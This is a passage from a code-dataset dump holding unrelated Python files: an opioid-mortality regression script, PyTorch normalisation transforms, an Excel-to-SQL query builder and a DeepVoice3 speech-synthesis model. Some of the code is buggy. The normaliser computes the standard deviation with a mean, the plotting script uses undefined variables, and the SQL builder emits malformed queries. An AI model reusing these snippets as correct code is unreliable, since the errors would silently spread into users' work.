State_data[Y]\n\n# change datatypes\nState_data['Deaths'] = pd.to_numeric(State_data.Deaths)\nState_data['Year'] = State_data['Year'].astype('int')\n\n# expand county state to two columns\nState_data[['County', 'State']] = State_data['County'].str.split(', ', expand=True)\n\n\nState_deaths = State_data.groupby(['Year'], as_index=False)['Deaths'].sum()\n\nState_pop_year = pd.read_csv('Individual States/WA_Census_Data_State.csv')\n#State_pop_year = State_pop.groupby(['Year'], as_index=False)['Total_population'].sum()\n#State_pop_year.rename(columns ={'Total_population':'Population'},inplace = True)\n# missing pop data b4 2010, use linear regression and append results to state_year level pop dataset\nlr = linear_model.LinearRegression()\nlr.fit(X=State_pop_year['Year'].values.reshape(-1, 1),\n y=State_pop_year['Population'].values.reshape(-1, 1))\nX_pred = np.arange(2003, 2010).reshape(-1, 1)\ny_pred = lr.predict(X_pred)\ntmp = np.vstack([X_pred.flatten(), y_pred.flatten()]).T\ntmp_df = pd.DataFrame(tmp, columns=['Year', 'Population'])\nState_pop_year2 = State_pop_year.copy()\nState_pop_year2 = State_pop_year2.append(tmp_df).sort_values(by='Year').astype('int64')\n\n# merge stata-year level pop and mortality dataset\nmerged_death_pop = pd.merge(State_deaths, State_pop_year2, on=['Year'], how='left')\n\n# Calc relative Mortiality per cap\nmerged_death_pop['Deaths_per_Pop'] = merged_death_pop['Deaths'] / \\\n merged_death_pop['Population'] * 100000\n\n# fit LinearRegression for mortlaity prediction after policy changers\n\nyears_from_2003 = policy_change_year - 2003\nlr2 = linear_model.LinearRegression()\nlr2.fit(X=merged_death_pop['Year'][:years_from_2003].values.reshape(-1, 1),\n y=merged_death_pop['Deaths_per_Pop'][:years_from_2003].values.reshape(-1, 1))\nmerged_death_pop['Pred_Deaths_per_Pop'] = lr2.predict(\n merged_death_pop['Year'].values.reshape(-1, 1)).flatten().T\n\n# Write file to csv\nmerged_death_pop.to_csv(\n \"/Users/N1/Op690/estimating-impact-of-opioid-prescription-regulations-team-3/20_intermediate_files/50_Washington_Prepost.csv\")\n\n# Washington plot\npolicy_change_year = 2012\n\nWA_PLOT = (ggplot(Washington, aes(x='Year', 
y='Deaths_per_Pop')) +\n geom_smooth(Washington.loc[Washington['Year'] >= policy_change_year], aes(x='Year', y='Pred_Deaths_per_Pop'), method='lm', level=0.95, color=\"red\") +\n geom_smooth(Washington.loc[Washington['Year'] >= policy_change_year], aes(x='Year', y='Deaths_per_Pop'), method='lm', level=0.95, color=\"blue\") +\n geom_smooth(Washington.loc[Washington['Year'] <= (policy_change_year-1)], aes(x='Year', y='Deaths_per_Pop'), method='lm', level=0.95, color=\"black\") +\n geom_vline(xintercept=policy_change_year, colour=\"#BB0000\") +\n ggtitle('Washington Mortality: Pre-Post Analysis') +\n xlim(2002, 2015) +\n ylab('Deaths per Capita (100k)')\n )\n\n\n(ggsave(p, width=10, height=10))\n","sub_path":"10_code/WA_Prepost_Analysis.py","file_name":"WA_Prepost_Analysis.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"457151793","text":"import numpy as np\r\nimport pandas as pd\r\nimport torch\r\n\r\n\r\nclass Normalise(object):\r\n \"\"\"\r\n Normalise features in sample according to given mean and std.\r\n Args:\r\n mean (pandas DataFrame).\r\n std (pandas DataFrame).\r\n \"\"\"\r\n def __init__(self, mean, std):\r\n self.mean = mean\r\n self.std = std\r\n \r\n # Find columns that dont contain \"auto\" values in mean and std\r\n self.cols_mean = mean.loc[:, mean.loc[0, :]!=\"auto\"].columns\r\n self.cols_std = std.loc[:, std.loc[0, :]!=\"auto\"].columns\r\n # Also find indices of these columns\r\n self.cols_mean_i = [self.mean.columns.get_loc(col) for col in self.cols_mean]\r\n self.cols_std_i = [self.std.columns.get_loc(col) for col in self.cols_std]\r\n \r\n # Convert dataframes to Series\r\n self.mean = self.mean.iloc[0, :]\r\n self.std = self.std.iloc[0, :]\r\n\r\n\r\n def __call__(self, datapoint):\r\n sample = datapoint[\"sample\"]\r\n target = datapoint[\"target\"]\r\n\r\n # Reorder columns in stats to match order of sample\r\n # Will throw an error if stats dont contain all the headers in sample\r\n #self.mean = self.mean[sample.columns]\r\n #self.std = self.std[sample.columns]\r\n\r\n # Calculate current mean and std of the sample\r\n automean = np.mean(sample.values, axis=0)\r\n autostd = np.mean(sample.values, axis=0)\r\n \r\n # Replace values that dont correspond to \"auto\" with values from self stats\r\n automean[self.cols_mean_i] = self.mean[self.cols_mean]\r\n autostd[self.cols_std_i] = self.std[self.cols_std]\r\n\r\n # Apply normalisation to sample\r\n sample = (sample - automean) / autostd\r\n\r\n datapoint = {\"sample\": sample, \"target\": target}\r\n return datapoint\r\n \r\n\r\nclass SelectFeatures(object):\r\n \"\"\"\r\n Choose which features to keep in sample and target (pandas dataframes).\r\n Args:\r\n input_features (sequence): list of input features to keep.\r\n output_features (sequence): list of output features to keep.\r\n \"\"\"\r\n def __init__(self, input_features, output_features):\r\n self.input_features = input_features\r\n self.output_features = output_features\r\n\r\n def __call__(self, datapoint):\r\n sample = datapoint[\"sample\"]\r\n target = datapoint[\"target\"]\r\n\r\n sample = sample[self.input_features]\r\n target = target[self.output_features]\r\n\r\n datapoint = {\"sample\": sample, \"target\": target}\r\n return datapoint\r\n\r\n\r\nclass ToTensor(object):\r\n \"\"\"\r\n Convert both sample and target (pandas dataframes) to pytorch tensors.\r\n \"\"\"\r\n def __call__(self, datapoint):\r\n sample = datapoint[\"sample\"].to_numpy()\r\n 
target = datapoint[\"target\"].to_numpy()\r\n sample = torch.Tensor(sample).transpose(-1, -2) # Transpose to BCL format\r\n target = torch.Tensor(target).transpose(-1, -2)\r\n \r\n datapoint = {\"sample\": sample, \"target\": target}\r\n return datapoint","sub_path":"transforms/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"530957856","text":"#TIAGO BORGES NASCIMENTO\nimport xlrd\n\n#apontar para o caminho do .xls\ncaminho= \"C:/Users/Root GOD/Desktop/Query Automatic/POSQL.xlsx\"\n\nexcel = xlrd.open_workbook(caminho)\nplan1 = excel.sheet_by_index(0)\n\n#print(plan1.cell_value(rowx=14, colx = 0)) ->printa o valor da celula\n\nstatus = (\"check\", \"submited\")\ncheck = []\nsubmited = []\ncolunas = [0, 1]\n\n\n#EXTRAI OS DADOS DO EXCEL \nfor celula in range(plan1.nrows):\n value = (int(plan1.cell_value(rowx = celula, colx = colunas[0]))), (str(plan1.cell_value(rowx = celula, colx = colunas[1]))) \n if value[1] in status[0]:\n check.append(value[0])\n if value[1] in status[1]:\n submited.append(value[0])\n\n#verifica a consistência dos dados\nprint(\"STATUS CHECK = \", check)\nprint(\"--------------------------------------------\")\nprint(\"STATUS SUBMITED = \", submited)\n#-----\nprint(\"--------------------------------------------\")\n\n#monta a query do SQL\nsql = \"UPDATE nome_tabela\\nSET \"\nsql2 = \"\"\nfor PO in check:\n sql2 += str(PO) +\"field = 'x', \"\nsql3 = \"\\nWHERE = condition\"\n\nsql = sql + sql2 + sql3\nprint(\"\"+ sql)\n#finaliza a query","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"309743713","text":"# coding: utf-8\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.autograd import Variable\nimport math\nimport numpy as np\n\nfrom fairseq.models.fconv import Embedding, Linear, LinearizedConvolution\nfrom fairseq.modules import GradMultiply\nfrom fairseq.modules.conv_tbc import ConvTBC as _ConvTBC\n\n\ndef Conv1d(in_channels, out_channels, kernel_size, dropout=0, **kwargs):\n from .conv import Conv1d\n m = Conv1d(in_channels, out_channels, kernel_size, **kwargs)\n std = math.sqrt((4 * (1.0 - dropout)) / (m.kernel_size[0] * in_channels))\n m.weight.data.normal_(mean=0, std=std)\n m.bias.data.zero_()\n return nn.utils.weight_norm(m)\n\n\ndef LinearizedConv1d(in_channels, out_channels, kernel_size, dilation=(1,), dropout=0, **kwargs):\n \"\"\"Weight-normalized Conv1d layer optimized for decoding\"\"\"\n assert dilation[0] == 1\n m = LinearizedConvolution(in_channels, out_channels, kernel_size, **kwargs)\n std = math.sqrt((4 * (1.0 - dropout)) / (m.kernel_size[0] * in_channels))\n m.weight.data.normal_(mean=0, std=std)\n m.bias.data.zero_()\n return nn.utils.weight_norm(m)\n\n\ndef ConvTBC(in_channels, out_channels, kernel_size, dilation=(1,), dropout=0, **kwargs):\n \"\"\"Weight-normalized Conv1d layer\"\"\"\n from fairseq.modules import ConvTBC\n assert dilation[0] == 1\n m = ConvTBC(in_channels, out_channels, kernel_size, **kwargs)\n std = math.sqrt((4 * (1.0 - dropout)) / (m.kernel_size[0] * in_channels))\n m.weight.data.normal_(mean=0, std=std)\n m.bias.data.zero_()\n return nn.utils.weight_norm(m, dim=2)\n\n\ndef has_dilation(convolutions):\n return np.any(np.array(list(map(lambda x: x[2], convolutions))) > 1)\n\n\ndef build_deepvoice3(n_vocab, 
embed_dim=256, mel_dim=80, linear_dim=4096, r=5,\n n_speakers=1, speaker_embed_dim=16, padding_idx=None,\n dropout=(1 - 0.95), kernel_size=5,\n encoder_channels=128,\n decoder_channels=256,\n converter_channels=256,\n query_position_rate=1.0,\n key_position_rate=1.29,\n use_memory_mask=False,\n trainable_positional_encodings=False,\n ):\n h = encoder_channels # hidden dim (channels)\n k = kernel_size # kernel size\n encoder = Encoder(\n n_vocab, embed_dim, padding_idx=padding_idx,\n n_speakers=n_speakers, speaker_embed_dim=speaker_embed_dim,\n dropout=dropout,\n # (channels, kernel_size, dilation)\n convolutions=[(h, k, 1), (h, k, 1), (h, k, 1), (h, k, 1),\n (h, k, 2), (h, k, 4), (h, k, 8)],\n )\n\n h = decoder_channels\n decoder = Decoder(\n embed_dim, in_dim=mel_dim, r=r, padding_idx=padding_idx,\n n_speakers=n_speakers, speaker_embed_dim=speaker_embed_dim,\n dropout=dropout,\n convolutions=[(h, k, 1), (h, k, 1), (h, k, 2), (h, k, 4), (h, k, 8)],\n attention=[True, False, False, False, True],\n force_monotonic_attention=[True, False, False, False, True],\n query_position_rate=query_position_rate,\n key_position_rate=key_position_rate,\n use_memory_mask=use_memory_mask)\n\n in_dim = h // r\n h = converter_channels\n converter = Converter(\n in_dim=in_dim, out_dim=linear_dim, dropout=dropout,\n convolutions=[(h, k, 1), (h, k, 1), (h, k, 2), (h, k, 4), (h, k, 8)])\n\n model = DeepVoice3(\n encoder, decoder, converter, padding_idx=padding_idx,\n mel_dim=mel_dim, linear_dim=linear_dim,\n n_speakers=n_speakers, speaker_embed_dim=speaker_embed_dim,\n trainable_positional_encodings=trainable_positional_encodings)\n\n return model\n\n\nclass DeepVoice3(nn.Module):\n def __init__(self, encoder, decoder, converter,\n mel_dim=80, linear_dim=4096,\n n_speakers=1, speaker_embed_dim=16, padding_idx=None,\n trainable_positional_encodings=False):\n super(DeepVoice3, self).__init__()\n self.mel_dim = mel_dim\n self.linear_dim = linear_dim\n self.trainable_positional_encodings = trainable_positional_encodings\n\n self.encoder = encoder\n self.decoder = decoder\n self.converter = converter\n self.encoder.num_attention_layers = sum(\n [layer is not None for layer in decoder.attention])\n\n # Speaker embedding\n if n_speakers > 1:\n self.embed_speakers = Embedding(\n n_speakers, speaker_embed_dim, padding_idx)\n self.n_speakers = n_speakers\n self.speaker_embed_dim = speaker_embed_dim\n\n self.use_text_pos_embedding_in_encoder = False\n\n def get_trainable_parameters(self):\n if self.trainable_positional_encodings:\n return self.parameters()\n\n # Avoid updating the position encoding\n pe_query_param_ids = set(map(id, self.decoder.embed_query_positions.parameters()))\n pe_keys_param_ids = set(map(id, self.decoder.embed_keys_positions.parameters()))\n freezed_param_ids = pe_query_param_ids | pe_keys_param_ids\n return (p for p in self.parameters() if id(p) not in freezed_param_ids)\n\n def forward(self, text_sequences, mel_targets=None, speaker_ids=None,\n text_positions=None, frame_positions=None, input_lengths=None):\n B = text_sequences.size(0)\n\n if speaker_ids is not None:\n speaker_embed = self.embed_speakers(speaker_ids)\n else:\n speaker_embed = None\n\n # (B, T, text_embed_dim)\n if self.use_text_pos_embedding_in_encoder:\n encoder_outputs = self.encoder(\n text_sequences, text_positions=text_positions,\n lengths=input_lengths, speaker_embed=speaker_embed)\n else:\n encoder_outputs = self.encoder(\n text_sequences, lengths=input_lengths, speaker_embed=speaker_embed)\n\n # (B, T', mel_dim*r)\n 
mel_outputs, alignments, done, decoder_states = self.decoder(\n encoder_outputs, mel_targets,\n text_positions=text_positions, frame_positions=frame_positions,\n speaker_embed=speaker_embed, lengths=input_lengths)\n\n # Reshape\n # (B, T, mel_dim)\n mel_outputs = mel_outputs.view(B, -1, self.mel_dim)\n decoder_states = decoder_states.view(B, mel_outputs.size(1), -1)\n\n # (B, T, linear_dim)\n linear_outputs = self.converter(decoder_states)\n\n return mel_outputs, linear_outputs, alignments, done\n\n def make_generation_fast_(self):\n\n def remove_weight_norm(m):\n try:\n nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n self.apply(remove_weight_norm)\n\n\nclass Encoder(nn.Module):\n def __init__(self, n_vocab, embed_dim, n_speakers, speaker_embed_dim,\n padding_idx=None, convolutions=((64, 5, .1),) * 7,\n max_positions=512, dropout=0.1):\n super(Encoder, self).__init__()\n self.dropout = dropout\n self.num_attention_layers = None\n\n # Text input embeddings\n self.embed_tokens = Embedding(n_vocab, embed_dim, padding_idx)\n\n # Text position embedding\n self.embed_text_positions = Embedding(\n max_positions, embed_dim, padding_idx)\n self.embed_text_positions.weight.data = position_encoding_init(\n max_positions, embed_dim)\n\n # Speaker embedding\n if n_speakers > 1:\n self.speaker_fc1 = Linear(speaker_embed_dim, embed_dim)\n self.speaker_fc2 = Linear(speaker_embed_dim, embed_dim)\n self.n_speakers = n_speakers\n\n # Non-causual convolutions\n in_channels = convolutions[0][0]\n self.fc1 = Linear(embed_dim, in_channels, dropout=dropout)\n self.projections = nn.ModuleList()\n self.speaker_projections = nn.ModuleList()\n self.convolutions = nn.ModuleList()\n\n Conv1dLayer = Conv1d if has_dilation(convolutions) else ConvTBC\n\n for (out_channels, kernel_size, dilation) in convolutions:\n pad = (kernel_size - 1) // 2 * dilation\n dilation = (dilation,)\n self.projections.append(Linear(in_channels, out_channels)\n if in_channels != out_channels else None)\n self.speaker_projections.append(\n Linear(speaker_embed_dim, out_channels) if n_speakers > 1 else None)\n self.convolutions.append(\n Conv1dLayer(in_channels, out_channels * 2, kernel_size, padding=pad,\n dilation=dilation, dropout=dropout))\n in_channels = out_channels\n self.fc2 = Linear(in_channels, embed_dim)\n\n def forward(self, text_sequences, text_positions=None, lengths=None,\n speaker_embed=None):\n assert self.n_speakers == 1 or speaker_embed is not None\n\n # embed text_sequences\n x = self.embed_tokens(text_sequences)\n if text_positions is not None:\n x += self.embed_text_positions(text_positions)\n\n x = F.dropout(x, p=self.dropout, training=self.training)\n\n # embed speakers\n if speaker_embed is not None:\n # expand speaker embedding for all time steps\n # (B, N) -> (B, T, N)\n ss = speaker_embed.size()\n speaker_embed = speaker_embed.unsqueeze(1).expand(\n ss[0], x.size(1), ss[-1])\n speaker_embed_btc = speaker_embed\n speaker_embed_tbc = speaker_embed.transpose(0, 1)\n x += F.softsign(self.speaker_fc1(speaker_embed_btc))\n\n input_embedding = x\n\n # project to size of convolution\n x = self.fc1(x)\n\n use_convtbc = isinstance(self.convolutions[0], _ConvTBC)\n # TBC case: B x T x C -> T x B x C\n # Generic case: B x T x C -> B x C x T\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n # 1D conv blocks\n for proj, speaker_proj, conv in zip(\n self.projections, self.speaker_projections, self.convolutions):\n residual = x if proj is None else proj(x)\n x = 
F.dropout(x, p=self.dropout, training=self.training)\n x = conv(x)\n splitdim = -1 if use_convtbc else 1\n a, b = x.split(x.size(splitdim) // 2, dim=splitdim)\n if speaker_proj is not None:\n softsign = F.softsign(speaker_proj(\n speaker_embed_tbc if use_convtbc else speaker_embed_btc))\n softsign = softsign if use_convtbc else softsign.transpose(1, 2)\n a = a + softsign\n x = a * F.sigmoid(b)\n x = (x + residual) * math.sqrt(0.5)\n\n # Back to batch first\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n # project back to size of embedding\n keys = self.fc2(x)\n if speaker_embed is not None:\n keys += F.softsign(self.speaker_fc2(speaker_embed_btc))\n\n # scale gradients (this only affects backward, not forward)\n if self.num_attention_layers is not None:\n keys = GradMultiply.apply(keys, 1.0 / (2.0 * self.num_attention_layers))\n\n # add output to input embedding for attention\n values = (keys + input_embedding) * math.sqrt(0.5)\n\n return keys, values\n\n\ndef get_mask_from_lengths(memory, memory_lengths):\n \"\"\"Get mask tensor from list of length\n Args:\n memory: (batch, max_time, dim)\n memory_lengths: array like\n \"\"\"\n mask = memory.data.new(memory.size(0), memory.size(1)).byte().zero_()\n for idx, l in enumerate(memory_lengths):\n mask[idx][:l] = 1\n return ~mask\n\n\nclass AttentionLayer(nn.Module):\n def __init__(self, conv_channels, embed_dim, dropout=0.1):\n super(AttentionLayer, self).__init__()\n # projects from output of convolution to embedding dimension\n self.in_projection = Linear(conv_channels, embed_dim)\n # projects from embedding dimension to convolution size\n self.out_projection = Linear(embed_dim, conv_channels)\n self.dropout = dropout\n\n def forward(self, query, encoder_out, mask=None, last_attended=None,\n window_size=3):\n keys, values = encoder_out\n residual = query\n\n # attention\n x = self.in_projection(query)\n x = torch.bmm(x, keys)\n\n mask_value = -float(\"inf\")\n if mask is not None:\n mask = mask.view(query.size(0), 1, -1)\n x.data.masked_fill_(mask, mask_value)\n\n if last_attended is not None:\n if last_attended > 0:\n x[:, :, :last_attended] = mask_value\n ahead = last_attended + window_size\n if ahead < x.size(-1):\n x[:, :, ahead:] = mask_value\n\n # softmax over last dim\n # (B, tgt_len, src_len)\n sz = x.size()\n x = F.softmax(x.view(sz[0] * sz[1], sz[2]), dim=1)\n x = x.view(sz)\n attn_scores = x\n\n x = F.dropout(x, p=self.dropout, training=self.training)\n\n x = torch.bmm(x, values)\n\n # scale attention output\n s = values.size(1)\n x = x * (s * math.sqrt(1.0 / s))\n\n # project back\n x = (self.out_projection(x) + residual) * math.sqrt(0.5)\n return x, attn_scores\n\n\ndef position_encoding_init(n_position, d_pos_vec, position_rate=1.0):\n ''' Init the sinusoid position encoding table '''\n\n # keep dim 0 for padding token position encoding zero vector\n position_enc = np.array([\n [position_rate * pos / np.power(10000, 2 * i / d_pos_vec) for i in range(d_pos_vec)]\n if pos != 0 else np.zeros(d_pos_vec) for pos in range(n_position)])\n\n position_enc[1:, 0::2] = np.sin(position_enc[1:, 0::2]) # dim 2i\n position_enc[1:, 1::2] = np.cos(position_enc[1:, 1::2]) # dim 2i+1\n return torch.from_numpy(position_enc).type(torch.FloatTensor)\n\n\nclass Decoder(nn.Module):\n def __init__(self, embed_dim, n_speakers, speaker_embed_dim,\n in_dim=80, r=5,\n max_positions=512, padding_idx=None,\n convolutions=((128, 5, 1),) * 4,\n attention=True, dropout=0.1,\n use_memory_mask=False,\n force_monotonic_attention=True,\n 
query_position_rate=1.0,\n key_position_rate=1.29,\n ):\n super(Decoder, self).__init__()\n self.dropout = dropout\n self.in_dim = in_dim\n self.r = r\n\n in_channels = in_dim * r\n if isinstance(attention, bool):\n # expand True into [True, True, ...] and do the same with False\n attention = [attention] * len(convolutions)\n\n # Position encodings for query (decoder states) and keys (encoder states)\n self.embed_query_positions = Embedding(\n max_positions, convolutions[0][0], padding_idx)\n self.embed_query_positions.weight.data = position_encoding_init(\n max_positions, convolutions[0][0], position_rate=query_position_rate)\n self.embed_keys_positions = Embedding(\n max_positions, embed_dim, padding_idx)\n self.embed_keys_positions.weight.data = position_encoding_init(\n max_positions, embed_dim, position_rate=key_position_rate)\n\n self.fc1 = Linear(in_channels, convolutions[0][0], dropout=dropout)\n in_channels = convolutions[0][0]\n\n # Causual convolutions\n self.projections = nn.ModuleList()\n self.convolutions = nn.ModuleList()\n self.attention = nn.ModuleList()\n\n Conv1dLayer = Conv1d if has_dilation(convolutions) else LinearizedConv1d\n\n for i, (out_channels, kernel_size, dilation) in enumerate(convolutions):\n pad = (kernel_size - 1) * dilation\n dilation = (dilation,)\n self.projections.append(Linear(in_channels, out_channels)\n if in_channels != out_channels else None)\n self.convolutions.append(\n Conv1dLayer(in_channels, out_channels * 2, kernel_size,\n padding=pad, dilation=dilation, dropout=dropout))\n self.attention.append(AttentionLayer(out_channels, embed_dim,\n dropout=dropout)\n if attention[i] else None)\n in_channels = out_channels\n self.fc2 = Linear(in_channels, in_dim * r)\n\n # decoder states -> Done binary flag\n self.fc3 = Linear(in_channels, 1)\n\n self._is_inference_incremental = False\n self.max_decoder_steps = 200\n self.min_decoder_steps = 10\n self.use_memory_mask = use_memory_mask\n if isinstance(force_monotonic_attention, bool):\n self.force_monotonic_attention = \\\n [force_monotonic_attention] * len(convolutions)\n else:\n self.force_monotonic_attention = force_monotonic_attention\n\n def forward(self, encoder_out, inputs=None,\n text_positions=None, frame_positions=None,\n speaker_embed=None, lengths=None):\n\n if inputs is None:\n assert text_positions is not None\n self._start_incremental_inference()\n outputs = self._incremental_forward(encoder_out, text_positions)\n self._stop_incremental_inference()\n return outputs\n\n # Grouping multiple frames if necessary\n if inputs.size(-1) == self.in_dim:\n inputs = inputs.view(inputs.size(0), inputs.size(1) // self.r, -1)\n assert inputs.size(-1) == self.in_dim * self.r\n\n keys, values = encoder_out\n\n if self.use_memory_mask and lengths is not None:\n mask = get_mask_from_lengths(keys, lengths)\n else:\n mask = None\n\n # position encodings\n if text_positions is not None:\n text_pos_embed = self.embed_keys_positions(text_positions)\n keys += text_pos_embed\n if frame_positions is not None:\n frame_pos_embed = self.embed_query_positions(frame_positions)\n\n # transpose only once to speed up attention layers\n keys = keys.transpose(1, 2).contiguous()\n\n x = inputs\n x = F.dropout(x, p=self.dropout, training=self.training)\n\n # project to size of convolution\n x = F.relu(self.fc1(x), inplace=False)\n\n use_convtbc = isinstance(self.convolutions[0], _ConvTBC)\n # TBC case: B x T x C -> T x B x C\n # Generic case: B x T x C -> B x C x T\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 
2)\n\n # temporal convolutions\n alignments = []\n for idx, (proj, conv, attention) in enumerate(zip(\n self.projections, self.convolutions, self.attention)):\n residual = x if proj is None else proj(x)\n if idx > 0:\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = conv(x)\n splitdim = -1 if use_convtbc else 1\n if use_convtbc:\n x = conv.remove_future_timesteps(x)\n else:\n x = x[:, :, :residual.size(-1)]\n a, b = x.split(x.size(splitdim) // 2, dim=splitdim)\n x = a * F.sigmoid(b)\n\n # Feed conv output to attention layer as query\n if attention is not None:\n # (B x T x C)\n x = x.transpose(1, 0) if use_convtbc else x.transpose(1, 2)\n x = x if frame_positions is None else x + frame_pos_embed\n x, alignment = attention(x, (keys, values), mask=mask)\n # (T x B x C)\n x = x.transpose(1, 0) if use_convtbc else x.transpose(1, 2)\n alignments += [alignment]\n\n # residual\n x = (x + residual) * math.sqrt(0.5)\n\n # Back to batch first\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n # well, I'm not sure this is really necesasary\n decoder_states = x\n\n # project to mel-spectorgram\n x = F.sigmoid(self.fc2(decoder_states))\n\n # Done flag\n done = F.sigmoid(self.fc3(decoder_states))\n\n return x, torch.stack(alignments), done, decoder_states\n\n def incremental_inference(self, beam_size=None):\n \"\"\"Context manager for incremental inference.\n This provides an optimized forward pass for incremental inference\n (i.e., it predicts one time step at a time). If the input order changes\n between time steps, call model.decoder.reorder_incremental_state to\n update the relevant buffers. To generate a fresh sequence, first call\n model.decoder.start_fresh_sequence.\n Usage:\n ```\n with model.decoder.incremental_inference():\n for step in range(maxlen):\n out = model.decoder(tokens[:, :step], positions[:, :step],\n encoder_out)\n probs = F.log_softmax(out[:, -1, :])\n ```\n \"\"\"\n class IncrementalInference(object):\n\n def __init__(self, decoder, beam_size):\n self.decoder = decoder\n self.beam_size = beam_size\n\n def __enter__(self):\n self.decoder._start_incremental_inference(self.beam_size)\n\n def __exit__(self, *args):\n self.decoder._stop_incremental_inference()\n\n return IncrementalInference(self, beam_size)\n\n def _start_incremental_inference(self):\n assert not self._is_inference_incremental, \\\n 'already performing incremental inference'\n self._is_inference_incremental = True\n\n # save original forward\n self._orig_forward = self.forward\n\n # switch to incremental forward\n self.forward = self._incremental_forward\n\n # start a fresh sequence\n self.start_fresh_sequence()\n\n def _stop_incremental_inference(self):\n # restore original forward\n self.forward = self._orig_forward\n\n self._is_inference_incremental = False\n\n def _incremental_forward(self, encoder_out, text_positions,\n initial_input=None, test_inputs=None):\n assert self._is_inference_incremental\n\n keys, values = encoder_out\n B = keys.size(0)\n\n # position encodings\n text_pos_embed = self.embed_keys_positions(text_positions)\n keys += text_pos_embed\n\n # transpose only once to speed up attention layers\n keys = keys.transpose(1, 2).contiguous()\n\n decoder_states = []\n outputs = []\n alignments = []\n dones = []\n # intially set to zeros\n last_attended = [None] * len(self.attention)\n for idx, v in enumerate(self.force_monotonic_attention):\n last_attended[idx] = 0 if v else None\n\n num_attention_layers = sum([layer is not None for layer in self.attention])\n t = 0\n if 
initial_input is None:\n initial_input = Variable(\n keys.data.new(B, 1, self.in_dim * self.r).zero_())\n current_input = initial_input\n while True:\n frame_pos = Variable(keys.data.new(B, 1).zero_().add_(t + 1)).long()\n frame_pos_embed = self.embed_query_positions(frame_pos)\n\n if test_inputs is not None:\n if t >= test_inputs.size(1):\n break\n current_input = test_inputs[:, t, :].unsqueeze(1)\n else:\n if t > 0:\n current_input = outputs[-1]\n x = current_input\n x = F.dropout(x, p=self.dropout, training=self.training)\n\n # project to size of convolution\n x = F.relu(self.fc1(x), inplace=False)\n\n # temporal convolutions\n ave_alignment = None\n for idx, (proj, conv, attention) in enumerate(zip(\n self.projections, self.convolutions, self.attention)):\n residual = x if proj is None else proj(x)\n if idx > 0:\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = conv.incremental_forward(x)\n a, b = x.split(x.size(-1) // 2, dim=-1)\n x = a * F.sigmoid(b)\n\n # attention\n if attention is not None:\n x = x + frame_pos_embed\n x, alignment = attention(x, (keys, values),\n last_attended=last_attended[idx])\n if self.force_monotonic_attention[idx]:\n last_attended[idx] = alignment.max(-1)[1].view(-1).data[0]\n if ave_alignment is None:\n ave_alignment = alignment\n else:\n ave_alignment = ave_alignment + alignment\n\n # residual\n x = (x + residual) * math.sqrt(0.5)\n\n ave_alignment = ave_alignment.div_(num_attention_layers)\n decoder_state = x\n\n output = F.sigmoid(self.fc2(decoder_state))\n\n # Done flag\n done = F.sigmoid(self.fc3(decoder_state))\n\n outputs += [output]\n decoder_states += [decoder_state]\n alignments += [ave_alignment]\n dones += [done]\n\n t += 1\n if (done > 0.5).all() and t > self.min_decoder_steps:\n break\n elif t > self.max_decoder_steps:\n print(\"Warning! 
doesn't seems to be converged\")\n break\n\n # Remove 1-element time axis\n alignments = list(map(lambda x: x.squeeze(1), alignments))\n decoder_states = list(map(lambda x: x.squeeze(1), decoder_states))\n outputs = list(map(lambda x: x.squeeze(1), outputs))\n\n # Combine outputs for all time steps\n alignments = torch.stack(alignments).transpose(0, 1)\n decoder_states = torch.stack(decoder_states).transpose(0, 1).contiguous()\n outputs = torch.stack(outputs).transpose(0, 1).contiguous()\n\n return outputs, alignments, dones, decoder_states\n\n def start_fresh_sequence(self):\n \"\"\"Clear all state used for incremental generation.\n **For incremental inference only**\n This should be called before generating a fresh sequence.\n beam_size is required if using BeamableMM.\n \"\"\"\n if self._is_inference_incremental:\n self.prev_state = None\n for conv in self.convolutions:\n conv.clear_buffer()\n\n\nclass Converter(nn.Module):\n def __init__(self, in_dim, out_dim, convolutions=((256, 5, 1),) * 4, dropout=0.1):\n super(Converter, self).__init__()\n self.dropout = dropout\n self.in_dim = in_dim\n self.out_dim = out_dim\n\n # Non-causual convolutions\n in_channels = convolutions[0][0]\n self.fc1 = Linear(in_dim, in_channels)\n self.projections = nn.ModuleList()\n self.convolutions = nn.ModuleList()\n\n Conv1dLayer = Conv1d if has_dilation(convolutions) else ConvTBC\n for (out_channels, kernel_size, dilation) in convolutions:\n pad = (kernel_size - 1) // 2 * dilation\n dilation = (dilation,)\n self.projections.append(Linear(in_channels, out_channels)\n if in_channels != out_channels else None)\n self.convolutions.append(\n Conv1dLayer(in_channels, out_channels * 2, kernel_size,\n padding=pad, dilation=dilation, dropout=dropout))\n in_channels = out_channels\n self.fc2 = Linear(in_channels, out_dim)\n\n def forward(self, x):\n # project to size of convolution\n x = F.relu(self.fc1(x), inplace=False)\n\n use_convtbc = isinstance(self.convolutions[0], _ConvTBC)\n # TBC case: B x T x C -> T x B x C\n # Generic case: B x T x C -> B x C x T\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n # 1D conv blocks\n for idx, (proj, conv) in enumerate(zip(self.projections, self.convolutions)):\n residual = x if proj is None else proj(x)\n if idx > 0:\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = conv(x)\n splitdim = -1 if use_convtbc else 1\n a, b = x.split(x.size(splitdim) // 2, dim=splitdim)\n x = a * F.sigmoid(b)\n x = (x + residual) * math.sqrt(0.5)\n\n # Back to batch first\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n return 